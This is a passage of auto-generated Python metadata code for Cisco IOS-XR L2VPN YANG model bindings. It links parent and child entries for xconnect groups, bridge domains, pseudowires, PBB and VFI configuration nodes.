_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireEvpns']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.Pseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.MonitorSessions']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.PseudowireRouteds']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect.AttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects.P2PXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info']
_meta_table['L2Vpn.Database.XconnectGroups.XconnectGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.XconnectGroups']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters.BdMacFilter']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacFilters']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.MacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings.PbbStaticMacMapping']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac.PbbEdgeMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacLimit']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon.BdPwSplitHorizonGroup']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires.BridgeDomainBackupPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwSplitHorizon']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BridgeDomainBackupPseudowires']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports.Transport']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings.Signaling']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Transports']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp.Signalings']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses.PseudowireStaticMacAddress']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwDhcpSnoop']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.VfiPwMplsStaticLabels']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire.PseudowireStaticMacAddresses']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires.VfiPseudowire']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.Vplsid']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol.FlowLabelLoadBalance']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.TwoByteAsOrFourByteAs']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget.Ipv4Address']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets.RouteTarget']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpRoutePolicy']['meta_info'].parent =_meta_table['L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery']['meta_info']
